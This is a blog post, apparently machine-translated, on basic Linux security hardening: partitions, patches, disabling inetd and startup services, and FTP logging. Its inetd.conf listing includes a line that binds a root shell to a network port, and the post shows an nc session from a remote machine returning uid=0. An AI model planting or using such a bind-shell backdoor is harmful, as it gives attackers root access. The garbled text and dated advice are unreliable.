This article is intended to let the reader on linux security configurations have a general understanding of, Oh, because I have also read some articles about this, saying that space, HA HA, in fact, I think the linux machine to do general security configuration, the minute they get, Hei Hei 1, installation, we are all familiar with, Oh, first, isolate network system, of course, choose custom installation, install the packages you need.
Hard drive partitions: If you use root partition record data such as log files and email, it may cause a denial of service produced a large number of logs or spam. Cause a system crash. It is recommended for the/var partition separately opened, used for storing logs and messages to avoid root partition is overrun, the miserable. The best for the particular application to open a separate partition, especially can produce excessive log program, there are proposals for a separate sub/home, so they can't fill the/partition, the following are my partitions on a hard drive:/root/var log/hacking hee hee, some black soft swap do not more/ome when the system restarts after finished installing, it is best to call the corresponding system of security patches, please develop good habits, remember, you're not at home with 98, pretend is a linux server, huh, huh. For redhat system, can be found at: http://www.redhat.com/corp/support/errata/patch. In later versions with redhat6.1 a tool up2date, it can measure which RPM packages you need to upgrade, and then automatically from redhat's site to download and complete the installation. 2, close the services hehe, good with words, you want your system absolutely safe, choke cable, Oh, of course, our machines to external services, it is not realistic, so shutting down unnecessary services is necessary because some services are for your system. The default linux is a powerful system, running a lot of services. However, there are many services are not needed and easily pose a security risk. The first file is the/etc/inetd.conf, it has developed a service that will be listening/usr/sbin/inetd, you may only need two: telnet and FTP, and other many as popd, imapd and rsh is likely to cause security problems. Use the following command displays have been commented out of service: suneagle # grep-v "#"/etc/inetd.con nowait root ftp streamtcp/usr/sbin/tcpd in.ftpd-l-a telnet stream tcp nowaitroot/usr/sbin/tcpd in.telnetd shell stream tcp nowait root/usr/sbin/tcpdin.rsd stream tcp nowait root login/usr/sbin/tcpdin.rlogind talk dgram udp wait nobody.tty/usr/sbin/tcpdin.talkd ntalk dgram udp wait nobody.tty/usr/sbin/tcpd in.ntalkd pop-3 stream tcp nowait root/usr/sbin/tcpd ipop3d imap stream tcp nowait root/usr/sbin/tcpd imapd finger stream tcp nowaitnobody/usr/sbin/tcpd in.fingerd linuxconfstreamtcpwaitroot/bin/linuxconflinuxconf--ttp stream tcp nowait root exec/bin/shs-I LOL look last row, not just tied up rootshell? Oh, what consequences? Oh look, one of the remote win2000 machine with the following command: E:\cmd > nc192.0.0.88512 bas # id id uid = 0 (root) gid = 0 (root) groups = 0 (root) bas # know? 嘿嘿, attention Oh * ^ _ ^ * I have written a article about using this file tied backdoor article, huh, huh, offensive, this command can help you find out there is no back door, huh, huh. Next is to start, they determine the .rc script init process which services you want to start. Redhat system, these scripts in/etc/rc.d/rc3.d (if your system to x as the default boot, then, is/etc/rc.d/rc5.d). To start a service when the prohibition, only need to replace the uppercase to lowercase S s, meanwhile, redhat also provides a tool to help you shut down the service, enter/usr/sbin/setup and choose systemservices ", you can customize which run at system startup. Another option is the chkconfig command, many linuX version of the system comes with the tool. The script name in the order of digital is starting to uppercase K at the beginning of the process is killed. The following are some of the major services: S05apmd notebook needs S10xntpd network time protocol S11portmap running rpc service required S15sound sound card related S15netfs nfs client S20rstatd avoid running service, remote users can get a lot of information S20rusersd S20rwod S20rwalld S20bootparamd diskless workstation S25squid Agent service S34yppasswdd NIS servers, this service vulnerability many S35ypserv NIS servers, this service vulnerability many S35dhcpd dhcp service S40atd and cron is very similar to running a program of scheduled services S45pcmcia PCMCIA card, notebook S50snmpd SNMP, remote users can access a number of system information S55named DNS service S55routed RIP, there is no need to keep running it S60lpd print service S60mars-nwe NetWare file and print services S60nfs NFS server, the vulnerabilities that many S72amd automount, mount the remote use of S75gated another routing services, such as the OSP S80sendmail mail services, such as closing, you can still send letters, just not the recipient and the Web server for relay S85httpd S87ypbind NIS client S90xfs Xfont Server S95innd News server Slinuxconf this are all familiar with it, huh, huh, through browser remote management systems use this command to view before you close the startup script of the number of services running: suneagle # ps-eaf | wc-l 54 my system has 54 service is running, when you close some service after running the above command again and see how much less. The fewer the services running, the more secure the system. Use the following command to see what services are running: suneagle # netstat-na--ip ActiveInternetconnections (serversandestablised) ProtoRecv-QSend-QLocalAddress ForeignAddress State tcp 0 136192.0.0.88: 23 192.0.0.5: 1236 ESTABLISED tcp 0 0192.0.0.88: 23 192.0.0.8: 1113 ESTABLISED tcp 0 0192.0.0.88: 139 192.0.0.8: 1112 ESTABLISED tcp 0 0192.0.0.88: 1024 61.153.17.24: 23 ESTABLISED tcp 0 0192.0.0.88: 23 192.0.0.8: 1084 ESTABLISED tcp 0 00.0.0.0: 139 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 80 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 25 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 515 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 512 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 98 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 79 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 143 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 110 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 513 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 514 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 23 0.0.0.0: * LISTEN tcp 0 00.0.0.0: 21 0.0.0.0: * LISTEN tcp 0 0 00.0.0.0: 113.0.0.0: * LISTEN tcp 0 00.0.0.0: 111 0.0.0.0: * LISTEN udp 1024 0 0127.0.0.1: 0.0.0.0: * udp 0 0192.0.0.88: 138 0.0.0.0: * udp 0 0192.0.0.88: 137 0.0.0.0: * udp 0 00.0.0.0: 138 0.0.0.0: * udp 0 00.0.0.0: 137 0.0.0.0: * udp 0 00.0.0.0: 518 0.0.0.0: * udp 0 00.0.0.0: 517 0.0.0.0: * udp 0 00.0.0.0: 111 0.0.0.0: * raw 0 00.0.0.0: 1 0.0.0.0: * 7 raw 0 00.0.0.0: 6 0.0.0.0: * 7 Oh, my system because the test, so deliberately opened many dangerous port, Oh, we don't learn me Oh, the gateway to gateway, HA HA. 3, the log records and enhanced close some unnecessary services, the log is also a need we care, configured unix system log very powerful, and even can make traps on the blog, I can write long-winded, here is a detail log of principle, interested friends can refer to the relevant information or read my other article on the principle of solaris system log. ! All logs are/var/log (only on linux systems), the default Linux log is a powerful addition to ftp. But we can modify/etc/inetd.conf/etc/ftpaccess or, to ensure each FTP connection logs are recorded. The following is an example of a modify inetd.conf: ftp stream tcp nowait root/usr/sbin/tcpd in.ftpd-l-L-i-o-l each ftp connections are written to the syslog-L record the user's every command-I file received, record the xferlog-o file transmitted, to the xferlog
No comments:
Post a Comment